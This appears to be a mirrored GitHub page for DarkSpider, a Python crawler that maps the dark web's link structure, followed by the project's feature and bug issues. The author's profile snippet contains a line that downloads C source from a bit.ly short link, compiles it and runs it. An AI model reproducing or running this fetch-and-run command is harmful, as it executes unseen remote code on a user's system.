proxzima / darkspider Goto Github PK

View Code? Open in Web Editor NEW

35.0 35.0 7.0 8.17 MB

Anatomy and Visualization of the Network structure of the Dark web using multi-threaded crawler

Home Page: https://proxzima.dev/DarkSpider/

License: GNU General Public License v3.0

Python 99.38% YARA 0.62%

collaborate crawler dark-web extractor github github-pages hacktoberfest networkx onion osint python scraper tor

darkspider's Introduction

Yo 👋, I'm Pratik Pingale 👨‍💻

class PROxZIMA:
  def __init__(self):
    subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
    self.bio = {
      '- 💼 I’m currently working for': {'Convin.ai' : 'https://convin.ai'},
      '- 🔭 I’m currently working on' : {'DarkSpider': 'https://github.com/PROxZIMA/DarkSpider',
                                         'Prism'     : 'https://github.com/PROxZIMA/prism',
                                         'Sweet-Pop' : 'https://github.com/PROxZIMA/Sweet-Pop'},
      '- 🌱 I’m currently learning'   : ['Django', 'C++', 'Python', 'Full Stack Development', 'Algo Trading'],
      '- 💬 Ask me anything'          : '¯\_(ツ)_/¯',
      '- 👨‍💻 My projects available at' : 'https://github.com/PROxZIMA?tab=repositories',
      '- 📄 Know about my experiences': 'https://proxzima.dev/resume',
      '- ⚡ Fun fact'                 : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
                                         'years away from the Sun in the southern constellation of Centaurus.')
    }

if __name__ == '__main__':
  import subprocess, pprint
  pprint.pprint(PROxZIMA().__dict__)

- Tools/Interests 🔗

- Workspace 🖥️

- Languages 🔭

- Stats ⚡️

- Find me around the web 🌎

darkspider's People

Contributors

Stargazers

Watchers

Forkers

outs1d3r-net daniel-dev-lab acealchemycyberblaze knightster0804 vaginessa cyber-seguranca

darkspider's Issues

Implement Incremental crawling

Is your feature request related to a problem? Please describe.

Incremental Crawler visits a specific site multiple times in a specific interval of time. The main focus of an incremental crawl is to keep on updating the hyperlink list of a site whose content is being changed frequently. At every iteration, after the crawler visits such a site, the site’s “freshness” keeps on decreasing as time passes. Hence in the next iteration, the crawler updates the hyperlinks, resetting the freshness.

Describe the solution you'd like
TODO

Describe alternatives you've considered
TODO

Additional context
TODO

TypeError: 'type' object is not subscriptable

I have installed requirements successfully but using Python 3.8 on both on Ubuntu 20.04 and Windows 10 I get the same error after trying to run darkspider.py:

Traceback (most recent call last):
  File "darkspider.py", line 58, in <module>
    from modules.helper import get_tor_proxies, setup_custom_logger
  File "/home/acwh0110/DarkSpider/modules/__init__.py", line 1, in <module>
    from modules.crawler import Crawler
  File "/home/acwh0110/DarkSpider/modules/crawler.py", line 15, in <module>
    from modules.checker import url_canon
  File "/home/acwh0110/DarkSpider/modules/checker.py", line 9, in <module>
    from modules.helper import TorProxyException, TorServiceException, get_requests_header
  File "/home/acwh0110/DarkSpider/modules/helper/__init__.py", line 1, in <module>
    from .helper import *
  File "/home/acwh0110/DarkSpider/modules/helper/helper.py", line 79, in <module>
    name: str, filename: str = "log.log", verbose_: bool = False, filelog: bool = True, argv: list[str] = None
TypeError: 'type' object is not subscriptable

Store links relation in one-to-many json dictionary format

Describe the solution you'd like
Track links generated in crawler module

Format proposal

{
  "link1": [
    "link2",
    "link3",
    "link4"
  ],
  "link2": [
    "link5",
    "link6",
    "link4"
  ],
  "link3": [
    "link7",
    "link2",
    "link9"
  ],
  "link4": [
    "link1"
  ]
}

Optimization

Prevent infinite looping: link1 -> link2 -> link4 -> link1

Connectivity of the dark web with the surface web.

TLD wise distribution of incoming links from dark web to the surface web.

-u build.py build' failed with exit code 1

Problem building wxpython. Already tried this but still get the below.

Checking for header Python.h                          : Distutils not installed? Broken python installation? Get python-config now!
      The configuration failed
      (complete log in /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/waf/3.8/gtk3/config.log)
      Command '"/usr/bin/python3.8" /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/bin/waf-2.0.24 --wx_config=/tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/wxbld/gtk3/wx-config --gtk3 --python="/usr/bin/python3.8" --out=build/waf/3.8/gtk3 configure build ' failed with exit code 1.
      Finished command: build_py (0m2.111s)
      Finished command: build (19m2.947s)
      Command '"/usr/bin/python3.8" -u build.py build' failed with exit code 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for wxpython
  Running setup.py clean for wxpython
Failed to build wxpython
Installing collected packages: wxpython, pandas, contourpy, beautifulsoup4, matplotlib, Gooey, seaborn
  Running setup.py install for wxpython ... error
  error: subprocess-exited-with-error
  
  × Running setup.py install for wxpython did not run successfully.
  │ exit code: 1
  ╰─> [63 lines of output]

and

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> wxpython

Multi-threading support to visit multiple pages at the same time

Describe the solution you'd like
-t, --thread number : How many pages to visit (Threads) at the same time (Default: 16)

Distance distribution of connected pairs

The distribution of the distance between connected pairs with the percentage of connected pairs.

Write white box unit test cases

Describe the solution you'd like
Generate unit test cases for each module respectively.

URL classification as illicit or not

Is your feature request related to a problem? Please describe.
The Ultimate aim of the project is to detect illicit websites. As of now the algorithm uses graph knowledge to target suspicious links. Advance techniques are required to accurately classify links and reduce the computational complexity.

Describe the solution you'd like
Text-based classification using NLP which transforms the crawler into Context Focused Crawler from the traditional Naive-Best First Crawler. This will further help in crawling at greater depths.

Describe alternatives you've considered
Classification technique is yet to be decided.

Actual results from the crawling.

Lay down the actual finding from all the graphs and insights. Must be logged in a file for further study.

Crawl images and scripts

Describe the solution you'd like
Make amends to crawl images as well as scripts

DarkSpider/modules/crawler.py

Lines 157 to 158 in 6c784e5

 # TODO: For images 

 # TODO: For scripts

Extractor should use proper mechanism to extract and store URLs

Is your feature request related to a problem? Please describe.

Extractor takes maximum file name length under consideration and creates sub-directories based on the url.

http://a.com/b.ext?x=&y=$%z2 -> a.com/b.extxyz2_.html (a.com folder with b.extxyz2_.html file in it)

This is good for storage purpose but does not act like a database.

Issues:

File retrieval and merging of data for URL classification is complex.
An URL can be very big but file names have length constraints.

Describe the solution you'd like
A linear architecture where a folder consists of files with file names as SHA1 hash of the respective URLs.

$ cat output/github.com/extracted/

00d1fbae77557ec45b3bfb3bdebfee49fd155cf9
b615c769e688dd83b2845ea0f32e2ee0c125c366
9b76fbceb3abd3423318ee37fd9ec1073961c14d

The links.txt file is renamed to links.json with the following content:

{
    "00d1fbae77557ec45b3bfb3bdebfee49fd155cf9": "http://github.com",
    "b615c769e688dd83b2845ea0f32e2ee0c125c366": "http://github.com/about/careers",
    "9b76fbceb3abd3423318ee37fd9ec1073961c14d": "http://github.com/sponsors"
}

Describe alternatives you've considered

Storing URLs in a big flat directories is a performance overhead as well (O(N) lookups).

Possible options:

SQL DB
Neo4j

Move Readme usage clutter to project's wiki page

Usage in README is still not detailed.
Based on current development as mentioned in #23 more functionality will be included in future so it'll be better to move usage to Wiki pages.

Crawl I2P links

Dark web isn't made of just .onion links. Dark web consist of various darknets such as tor, I2P and freenet. These darknets also holds considerable amount of data. As they are P2P (peer to peer) networks, some adjustments are required to crawl them as well

Describe the solution you'd like